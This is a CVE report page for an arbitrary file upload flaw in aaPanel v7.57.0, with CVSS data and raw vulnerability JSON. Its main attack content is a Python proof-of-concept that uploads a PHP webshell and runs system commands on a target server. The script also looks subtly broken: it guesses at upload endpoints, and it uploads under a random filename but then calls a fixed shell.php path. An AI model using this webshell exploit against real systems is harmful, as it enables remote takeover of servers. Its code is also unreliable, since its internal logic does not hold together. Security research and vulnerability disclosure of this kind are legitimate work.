Security Vulnerability Report
CVE-2026-29859 CVSS 9.8 CRITICAL

CVE-2026-29859

Published: 2026-03-18 18:16:27
Last Modified: 2026-03-23 16:16:45

Description

An arbitrary file upload vulnerability in aaPanel v7.57.0 allows attackers to execute arbitrary code by uploading a crafted file.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:aapanel:aapanel:7.57.0:*:*:*:*:*:*:* - VULNERABLE
aaPanel v7.57.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys import random import string # CVE-2026-29859 PoC - aaPanel v7.57.0 Arbitrary File Upload # Target: aaPanel v7.57.0 # Vulnerability: Arbitrary file upload leading to RCE def generate_random_string(length=8): return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) def upload_webshell(target_url, webshell_code): """ Upload malicious file to target server """ filename = f"{generate_random_string()}.php" # Construct the file upload request files = { 'file': (filename, webshell_code, 'application/x-php') } # Try common aaPanel upload endpoints upload_endpoints = [ '/api/panel/upload', '/api/upload', '/files/upload', '/panel/upload' ] for endpoint in upload_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.post(url, files=files, timeout=10) if response.status_code == 200: print(f"[+] Upload successful via {endpoint}") return url.replace(endpoint, response.json().get('path', '')) except Exception as e: print(f"[-] Failed to upload via {endpoint}: {e}") return None def execute_command(target_url, command): """ Execute system command via uploaded webshell """ webshell_url = target_url + "/uploads/shell.php" params = {'cmd': command} try: response = requests.get(webshell_url, params=params, timeout=10) return response.text except Exception as e: return f"Error: {e}" def main(): if len(sys.argv) < 2: print("Usage: python cve-2026-29859.py <target_url>") print("Example: python cve-2026-29859.py http://target.com:7800") sys.exit(1) target_url = sys.argv[1] # PHP webshell code webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" print("[*] CVE-2026-29859 - aaPanel v7.57.0 Arbitrary File Upload") print(f"[*] Target: {target_url}") # Step 1: Upload webshell print("\n[1] Uploading webshell...") uploaded_path = upload_webshell(target_url, webshell) if uploaded_path: print(f"[+] Webshell uploaded to: {uploaded_path}") # Step 2: Execute commands print("\n[2] Testing RCE...") result = 
execute_command(target_url, "whoami") print(f"[+] Command output: {result}") else: print("[-] Failed to upload webshell") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29859", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.347", "lastModified": "2026-03-23T16:16:45.193", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file upload vulnerability in aaPanel v7.57.0 allows attackers to execute arbitrary code via uploading a crafted file."}, {"lang": "es", "value": "Una vulnerabilidad de carga arbitraria de archivos en aaPanel v7.57.0 permite a los atacantes ejecutar código arbitrario mediante la carga de un archivo manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aapanel:aapanel:7.57.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEA5AFC6-F733-4683-A374-C9665E0A2250"}]}]}], "references": [{"url": "https://github.com/aapanel/aapanel", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/mbiesiad/vulnerability-research/tree/main/CVE-2026-29859", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}